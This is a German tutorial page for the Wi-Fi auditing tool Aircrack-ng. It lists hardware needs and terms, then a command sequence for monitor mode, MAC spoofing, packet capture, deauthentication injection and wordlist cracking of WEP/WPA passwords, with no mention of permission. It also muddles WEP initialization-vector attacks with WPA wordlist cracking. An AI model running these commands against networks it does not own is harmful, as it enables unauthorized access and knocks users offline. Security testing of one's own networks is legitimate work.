Aircrack-ng

Aircrack-ng ist ein Programm mit dessen Hilfe verschlüsselte Netzwerke entschlüsselt werden können. Mögliche zu entschlüsselnde Verschlüsselungsprotokolle sind WEP und WPA/WPA2.

Um Aircrack-ng nutzen zu können müssen Sie über eine kompatible wireless card verfügen. Um den Chipsatz der wireless card herauszufinden gehen Sie folgendermaßen vor: https://www.aircrack-ng.org/doku.php?id=getting_started.
Ist in Ihrem Notebook keine passende wireless card verbaut, können Sie sich einen Drahtlosnetzwerkadapter kaufen.

Desweiteren ist empfehlenswert eine virtuelle Maschine zu benutzen, auf der Sie Kali Linux installieren. https://www.kali.org/

Benötigte Komponenten

Kompatible USB WLAN-Adapter

Die folgenden Drahtlosnetzwerkadapter sind mit Kali Linux und Aircrack-ng kompatibel und funktionieren einwandfrei.

Begriffserklärung

AP (Accesspoint)

Ein Accesspoint (deutsch Zugangspunkt/Zugriffspunkt) ist ein Gerät zur drahtlosen Verbindung von Computern, die es Nutzern ermöglicht auf Netzwerkressourcen zuzugreifen. Jeder Accesspoint hat eine MAC-Adresse.

BSSID (Basic Service Set Identifier)

Dient der eindeutigen Identifizierung eines WLAN-Routers in einem Funknetz. MAC-Adresse des Accesspoints.

ESSID (Extended Service Set Identifier

Name des Netzwerkes

Monitor Mode

Der monitor mode einer wireless card oder eines wireless adapters, ermöglicht die Darstellung des gesamten Traffics, der von einem drahtlosen Netzwerk empfangen werden kann.

Mögliche Probleme

Zugriff auf '/sys/class/ieee80211/' nicht möglich: Datei oder Verzeichnis nicht gefunden Lösung des Problems: Laden Sie sich unter folgendem Link die aktuelle Version des Backport-Projekts herunter (.tar.bz2-Datei).
https://mirrors.edge.kernel.org/pub/linux/kernel/projects/backports/stable/3.10.17/
Den heruntergeladenen Ordner entpacken Sie, und wechseln anschließend in das entpackte Verzeichnis. Dort führen Sie nacheinander folgende beiden Befehle aus:

make unload
make load

Mehr Informationen zum Backport Projekt finden Sie hier:
https://backports.wiki.kernel.org/index.php/Main_Page

Wichtige Befehle

Das Ziel ist es, schwache Initialisierungsvektoren (IVs) aus der Luft zu entdecken, mit einer Wörterliste abzugleichen und somit das Passwort zu knacken.

Zeigt die Einstellungen aller Netzwerk-Interfaces anifconfig
Zeigt die Einstellungen der WLAN-Interfaces aniwconfig
Um das drahtlose Netzwerk belauschen zu können, muss zunächst die WLAN-Karte in den Monitor mode versetzt werdenairmon-ng start wlan0
Deaktiviert den Monitor modeairmon-ng stop wlan0mon
Unter Umständen kann es hilfreich sein, die MAC-Adresse zu ändern

ifconfig wlan0mon down

macchanger -a wlan0mon

ifconfig wlan0mon up
Zeigt laufende Prozesse an. Diese können später Probleme verursachenairmon-ng check
Beendet laufende Prozessekill [number]
Nachdem die WLAN-Karte in den Monitor Mode versetzt wurde, können alle in Reichweite befindlichen Access Points angezeigt werdenairodump-ng wlan0mon
* CTRL+C pausiert die Suche
Erfasst die Initialisierungsvektoren eines Access Points und schreibt sie in eine Dateiairodump-ng --channel [channel id] --write [name] --bssid [bssid] wlan0mon
Packet Injection, führt eine Deauthentifikation durchaireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0mon
Versucht das Passwort anhand der gesammelten IVs und einer Wörterliste herauszufindenaircrack-ng -w [wordlist] -b [bssid] [name]-07.cap